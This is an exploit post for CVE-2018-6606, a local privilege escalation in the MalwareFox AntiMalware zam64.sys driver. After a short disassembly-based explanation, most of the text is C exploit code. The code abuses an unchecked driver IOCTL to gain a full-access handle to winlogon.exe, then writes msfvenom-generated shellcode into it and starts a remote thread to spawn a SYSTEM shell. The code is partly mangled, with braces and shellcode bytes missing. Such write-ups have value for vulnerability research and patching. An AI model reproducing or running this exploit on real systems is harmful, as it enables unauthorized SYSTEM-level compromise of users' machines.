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MalwareFox AntiMalware - Privilege Escalation
来源:vfocus.net 作者:Hammou 发布时间:2018-02-08  
Title: MalwareFox AntiMalware - Local Privilege Escalation
Date: 03/02/2018
Author: Souhail Hammou
Vendor Homepage: https://www.malwarefox.com/
Tested on: Windows 7 32-bit / Windows 10 64-bit
CVE: CVE-2018-6606
#include <Windows.h>
#include <TlHelp32.h>
#include <stdio.h>
BOOL RegisterProcessByIOCTL(HANDLE hDevice)
    DWORD pid, BytesReturned;
    IOCTL 0x80002010 registers a process, by its PID, as trusted by the driver. Registered
    processes can send special IOCTLs to the driver to do stuff like:
        - Enable/Disable real-time protection
        - Write to raw disk
        - Open full access handles to processes
        - ...etc
    When a process sends a special IOCTL, the driver checks if that process is registered (as
    shown in the disassembly below at address 0000000140010573).
    However, when a process sends the IOCTL 0x80002010 to register a process by its PID, the driver
    doesn't check to see if the requestor itself is registered (0000000140010553).
    That way, any process can register any other process (including itself) with the driver.
    .text:000000014001054A                 mov     ebx, [rcx+_IO_STACK_LOCATION.Parameters.DeviceIoControl.IoControlCode]
    .text:000000014001054D                 cmp     ebx, 80002010h
    .text:0000000140010553                 jz      short find_ioctl_dispatcher ;jump past the check
    .text:0000000140010573                 mov     edx, 1
    .text:0000000140010578                 mov     ecx, ebp ; Requestor_PID
    .text:000000014001057A                 call    IsProcessRegistered
    .text:000000014001057F                 lea     rdx, aMain_c
    .text:0000000140010586                 test    eax, eax
    .text:0000000140010588                 jnz     short loc_1400105C2
    .text:000000014001058A                 mov     [rsp+68h+var_38], ebp
    .text:000000014001058E                 lea     rax, aProcessidDIsNo
    .text:0000000140010595                 mov     edi, STATUS_ACCESS_DENIED
    .text:00000001400105C8 find_ioctl_dispatcher:                  ; CODE XREF: sub_1400104BC+97j
    .text:00000001400105C8                                         ; sub_1400104BC+ACj
    .text:0000000140010612                 cmp     ebx, 80002010h
    .text:0000000140010618                 jz      loc_1400106D7  ; dispatch the IOCTL
    pid = GetCurrentProcessId(); //Register our process with the driver
    if (!DeviceIoControl(hDevice, 0x80002010, &pid, sizeof(DWORD), NULL, 0, &BytesReturned, NULL))
        return FALSE;
    return TRUE;
DWORD GetWinlogonPID()
    DWORD WinlogonPid = 0;
    PROCESSENTRY32 ProcessEntry;
    ProcessEntry.dwSize = sizeof(PROCESSENTRY32);
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnapshot == INVALID_HANDLE_VALUE)
        printf("[-] CreateToolhelp32Snapshot failed !\n");
        goto ret;
    if (!Process32First(hSnapshot, &ProcessEntry))
        printf("[-] Process32First failed !\n");
        goto cleanup;
        if (!lstrcmp(ProcessEntry.szExeFile, "winlogon.exe"))
            WinlogonPid = ProcessEntry.th32ProcessID;
    } while (Process32Next(hSnapshot, &ProcessEntry));
    return WinlogonPid;
int main(int argc, char** argv)
    DWORD BytesReturned;
    DWORD winlogon_pid;
    HANDLE winlogon_handle;
    LPVOID RemoteAllocation;
    HANDLE hDevice;
    printf("===      MalwareFox Anti-Malware zam64.sys Local Privilege Escalation      ===\n");
    printf("                              Tested on Windows 10 64-bit                                \n");
    printf("                                   Souhail Hammou                                      \n\n");
    printf("[*] Stage 1: Registering the process with the driver by sending IOCTL 0x80002010\n");
    hDevice = CreateFile
    if (hDevice == INVALID_HANDLE_VALUE)
        return 0;
    if (!RegisterProcessByIOCTL(hDevice))
        printf("\t[-] Registration Failed !\n");
        return 0;
    printf("\t[+] Process registered.\n[*] Stage 2: \n");
    printf("\t[+] Getting Winlogon's PID\n");
    winlogon_pid = GetWinlogonPID();
    if (!winlogon_pid)
        printf("\t[-] GetWinlogonPID() failed !\n");
        return 0;
    printf("\t[+] (IOCTL) Opening a full access, user-mode accessible handle from kernel-mode to winlogon\n");
    The dispatcher for IOCTL code 0x8000204C opens a full access handle, accessible from usermode, to a process.
    We use this IOCTL to open a full access handle to winlogon.exe.
    Note that this IOCTL can only be sent if the process is registered with the driver.
    if (!DeviceIoControl(hDevice, 0x8000204C, &winlogon_pid, sizeof(DWORD), &winlogon_handle, sizeof(HANDLE), &BytesReturned, NULL))
        printf("\t[-] DeviceIoControl 0x8000204C failed !\n");
        return 0;
    printf("\t[+] Allocating executable memory in winlogon.exe using the full access handle\n");
    if (!(RemoteAllocation = VirtualAllocEx(winlogon_handle, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE)))
        printf("\t[-] VirtualAllocEx failed !\n");
        return 0;
    printf("\t[+] Writing shellcode to allocated memory\n");
    /*msfvenom -p windows/x64/exec CMD=cmd.exe EXITFUNC=thread -f c*/
    unsigned char buf[] =
    if (!WriteProcessMemory(winlogon_handle, RemoteAllocation, buf, sizeof(buf), &BytesReturned))
        printf("\t[-] WriteProcessMemory Failed !\n");
        return 0;
    printf("\t[+] Spawning SYSTEM shell\n");
    if (!CreateRemoteThread(winlogon_handle, NULL, 0, RemoteAllocation, NULL, 0, NULL))
        printf("\t[-] CreateRemoteThread Failed! Did you compile the exploit as a 64-bit executable ?\n");
        return 0;
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